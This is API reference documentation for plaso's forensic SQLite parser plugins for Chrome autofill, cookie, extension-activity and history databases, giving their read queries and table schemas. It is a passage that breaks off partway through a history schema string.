class plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillEventData
    Bases: plaso.containers.events.EventData
    Chrome Autofill event data.
        field_name (str): name of form field.
        query (str): SQL query that was used to obtain the event data.
        usage_count (int): count of times value has been used in field_name.
        value (str): value populated in form field.
    DATA_TYPE = 'chrome:autofill:entry'

class plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillPlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
    SQLite parser plugin for Google Chrome autofill database (Web Data) files.
    The Google Chrome autofill database (Web Data) file is typically stored in: Web Data
    DATA_FORMAT = 'Google Chrome autofill SQLite database (Web Data) file'
    NAME = 'chrome_autofill'
    ParseAutofillRow(parser_mediator, query, row, **unused_kwargs)
        Parses an autofill entry row.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
    QUERIES = [('SELECT autofill.date_created, autofill.date_last_used, autofill.name, autofill.value, autofill.count FROM autofill ORDER BY date_created', 'ParseAutofillRow')]
    REQUIRED_STRUCTURE = {'autofill': frozenset({'count', 'date_created', 'date_last_used', 'name', 'value'})}
    SCHEMAS = [{'autofill': 'CREATE TABLE autofill (name VARCHAR, value VARCHAR, value_lower VARCHAR, date_created INTEGER DEFAULT 0, date_last_used INTEGER DEFAULT 0, count INTEGER DEFAULT 1, PRIMARY KEY (name, value));)'}]

plaso.parsers.sqlite_plugins.chrome_cookies module

SQLite parser plugin for Google Chrome cookies database files.

class plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
    SQLite parser plugin for Google Chrome cookies database files.
    GA_UTMZ_TRANSLATION = {'utmccn': 'Ad campaign information.', 'utmcct': 'Path to the page of referring link.', 'utmcmd': 'Last type of visit.', 'utmcsr': 'Last source used to access.', 'utmctr': 'Keywords used to find site.'}
    ParseCookieRow(parser_mediator, query, row, **unused_kwargs)
        Parses a cookie row.
        Parameters
        • parser_mediator (ParserMediator) – parser mediator.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row resulting from the query.

class plaso.parsers.sqlite_plugins.chrome_cookies.Chrome17CookiePlugin
    Bases: plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePlugin
    SQLite parser plugin for Google Chrome 17 - 65 cookies database files.
    DATA_FORMAT = 'Google Chrome 17 - 65 cookies SQLite database file'
    NAME = 'chrome_17_cookies'
    QUERIES = [('SELECT creation_utc, host_key, name, value, path, expires_utc, secure, httponly, last_access_utc, has_expires, persistent FROM cookies', 'ParseCookieRow')]
    REQUIRED_STRUCTURE = {'cookies': frozenset({'creation_utc', 'expires_utc', 'has_expires', 'host_key', 'httponly', 'last_access_utc', 'name', 'path', 'persistent', 'secure', 'value'}), 'meta': frozenset({})}
    SCHEMAS = [{'cookies': 'CREATE TABLE cookies (creation_utc INTEGER NOT NULL UNIQUE PRIMARY KEY, host_key TEXT NOT NULL, name TEXT NOT NULL, value TEXT NOT NULL, path TEXT NOT NULL, expires_utc INTEGER NOT NULL, secure INTEGER NOT NULL, httponly INTEGER NOT NULL, last_access_utc INTEGER NOT NULL, has_expires INTEGER DEFAULT 1, persistent INTEGER DEFAULT 1)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'}]

class plaso.parsers.sqlite_plugins.chrome_cookies.Chrome66CookiePlugin
    Bases: plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePlugin
    SQLite parser plugin for Google Chrome 66+ cookies database files.
    DATA_FORMAT = 'Google Chrome 66 and later cookies SQLite database file'
    NAME = 'chrome_66_cookies'
    QUERIES = [('SELECT creation_utc, host_key, name, value, path, expires_utc, is_secure AS secure, is_httponly AS httponly, last_access_utc, has_expires, is_persistent AS persistent FROM cookies', 'ParseCookieRow')]
    REQUIRED_STRUCTURE = {'cookies': frozenset({'creation_utc', 'expires_utc', 'has_expires', 'host_key', 'is_httponly', 'is_persistent', 'is_secure', 'last_access_utc', 'name', 'path', 'value'}), 'meta': frozenset({})}
    SCHEMAS = [{'cookies': "CREATE TABLE cookies (creation_utc INTEGER NOT NULL, host_key TEXT NOT NULL, name TEXT NOT NULL, value TEXT NOT NULL, path TEXT NOT NULL, expires_utc INTEGER NOT NULL, is_secure INTEGER NOT NULL, is_httponly INTEGER NOT NULL, last_access_utc INTEGER NOT NULL, has_expires INTEGER NOT NULL DEFAULT 1, is_persistent INTEGER NOT NULL DEFAULT 1, priority INTEGER NOT NULL DEFAULT 1, encrypted_value BLOB DEFAULT '', firstpartyonly INTEGER NOT NULL DEFAULT 0, UNIQUE (host_key, name, path))", 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'}]

class plaso.parsers.sqlite_plugins.chrome_cookies.ChromeCookieEventData
    Bases: plaso.containers.events.EventData
    Chrome Cookie event data.
        cookie_name (str): name of the cookie.
        host (str): hostname of host that set the cookie value.
        httponly (bool): True if the cookie cannot be accessed through client side script.
        path (str): path where the cookie got set.
        persistent (bool): True if the cookie is persistent.
        query (str): SQL query that was used to obtain the event data.
        secure (bool): True if the cookie should only be transmitted over a secure channel.
        url (str): URL or path where the cookie got set.
        data (str): value of the cookie.
    DATA_TYPE = 'chrome:cookie:entry'

plaso.parsers.sqlite_plugins.chrome_extension_activity module

SQLite parser plugin for Google Chrome extension activity database files.

class plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventData
    Bases: plaso.containers.events.EventData
    Chrome Extension Activity event data.
        action_type (str): action type.
        activity_id (str): activity identifier.
        api_name (str): name of API.
        arg_url (str): URL argument.
        args (str): arguments.
        extension_id (str): extension identifier.
        other (str): other.
        page_title (str): title of webpage.
        page_url (str): URL of webpage.
        query (str): SQL query that was used to obtain the event data.
    DATA_TYPE = 'chrome:extension_activity:activity_log'

class plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityPlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
    SQLite parser plugin for Google Chrome extension activity database files.
    The Google Chrome extension activity database file is typically stored in: Extension Activity
    DATA_FORMAT = 'Google Chrome extension activity SQLite database file'
    NAME = 'chrome_extension_activity'
    ParseActivityLogUncompressedRow(parser_mediator, query, row, **unused_kwargs)
        Parses an activity log row.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
    QUERIES = [('SELECT time, extension_id, action_type, api_name, args, page_url, page_title, arg_url, other, activity_id FROM activitylog_uncompressed ORDER BY time', 'ParseActivityLogUncompressedRow')]
    REQUIRED_STRUCTURE = {'activitylog_compressed': frozenset({'action_type', 'api_name_x', 'arg_url_x', 'args_x', 'extension_id_x', 'other_x', 'page_title_x', 'page_url_x', 'time'})}
    SCHEMAS = [{'activitylog_compressed': 'CREATE TABLE activitylog_compressed (count INTEGER NOT NULL DEFAULT 1, extension_id_x INTEGER NOT NULL, time INTEGER, action_type INTEGER, api_name_x INTEGER, args_x INTEGER, page_url_x INTEGER, page_title_x INTEGER, arg_url_x INTEGER, other_x INTEGER)', 'string_ids': 'CREATE TABLE string_ids (id INTEGER PRIMARY KEY, value TEXT NOT NULL)', 'url_ids': 'CREATE TABLE url_ids (id INTEGER PRIMARY KEY, value TEXT NOT NULL)'}]

plaso.parsers.sqlite_plugins.chrome_history module

SQLite parser plugin for Google Chrome history database files.

class plaso.parsers.sqlite_plugins.chrome_history.BaseGoogleChromeHistoryPlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
    SQLite parser plugin for Google Chrome history database files.
    The Google Chrome history database file is typically stored in: Archived History, History
    Note that the Archived History database does not contain the downloads table.
    ParseLastVisitedRow(parser_mediator, query, row, cache=None, database=None, **unused_kwargs)
        Parses a last visited row.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
        • cache (SQLiteCache) – cache which contains cached results from querying the visits and urls tables.
        • database (Optional[SQLiteDatabase]) – database.

class plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryFileDownloadedEventData
    Bases: plaso.containers.events.EventData
    Chrome History file downloaded event data.
        danger_type (int): assessment by Safe Browsing of the danger of the downloaded content.
        full_path (str): full path where the file was downloaded to.
        interrupt_reason (int): indication why the download was interrupted.
        offset (str): identifier of the row, from which the event data was extracted.
        opened (int): value to indicate if the downloaded file was opened from the browser.
        query (str): SQL query that was used to obtain the event data.
        received_bytes (int): number of bytes received while downloading.
        state (int): state of the download, such as finished or cancelled.
        total_bytes (int): total number of bytes to download.
        url (str): URL of the downloaded file.
    DATA_TYPE = 'chrome:history:file_downloaded'

class plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryPageVisitedEventData
    Bases: plaso.containers.events.EventData
    Chrome History page visited event data.
        from_visit (str): URL where the visit originated from.
        offset (str): identifier of the row, from which the event data was extracted.
        page_transition_type (int): type of transitions between pages.
        query (str): SQL query that was used to obtain the event data.
        title (str): title of the visited page.
        typed_count (int): number of characters of the URL that were typed.
        url (str): URL of the visited page.
        url_hidden (bool): True if the URL is hidden.
        visit_source (int): source of the page visit.
    DATA_TYPE = 'chrome:history:page_visited'

class plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome27HistoryPlugin
    Bases: plaso.parsers.sqlite_plugins.chrome_history.BaseGoogleChromeHistoryPlugin
    SQLite parser plugin for Google Chrome 27+ history database files.
    DATA_FORMAT = 'Google Chrome 27 and later history SQLite database file'
    NAME = 'chrome_27_history'
    ParseFileDownloadedRow(parser_mediator, query, row, **unused_kwargs)
        Parses a file downloaded row.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
    QUERIES = [('SELECT urls.id, urls.url, urls.title, urls.visit_count, urls.typed_count, urls.last_visit_time, urls.hidden, visits.visit_time, visits.from_visit, visits.transition, visits.id AS visit_id FROM urls, visits WHERE urls.id = visits.url ORDER BY visits.visit_time', 'ParseLastVisitedRow'), ('SELECT downloads.id AS id, downloads.start_time,downloads.target_path, downloads_url_chains.url, downloads.received_bytes, downloads.total_bytes, downloads.end_time, downloads.state, downloads.danger_type, downloads.interrupt_reason, downloads.opened FROM downloads, downloads_url_chains WHERE downloads.id = downloads_url_chains.id', 'ParseFileDownloadedRow')]
    REQUIRED_STRUCTURE = {'downloads': frozenset({'danger_type', 'end_time', 'id', 'interrupt_reason', 'opened', 'received_bytes', 'start_time', 'state', 'target_path', 'total_bytes'}), 'downloads_url_chains': frozenset({'id', 'url'}), 'urls': frozenset({'hidden', 'id', 'last_visit_time', 'title', 'typed_count', 'url', 'visit_count'}), 'visits': frozenset({'from_visit', 'id', 'transition', 'visit_time'})}


SCHEMAS = [{'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL, interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL, interrupt_reason INTEGER NOT NULL,end_time INTEGER 
NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type 
VARCHAR(255) NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type 
VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT 
NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,last_access_time INTEGER NOT NULL,transient INTEGER NOT 
NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR 
NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL, last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY 
KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': "CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL, guid VARCHAR NOT NULL DEFAULT '', hash BLOB NOT NULL DEFAULT X'', http_method VARCHAR NOT NULL DEFAULT '', tab_url VARCHAR NOT NULL DEFAULT '', tab_referrer_url VARCHAR NOT NULL DEFAULT '', site_url VARCHAR NOT NULL DEFAULT '', last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)", 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name 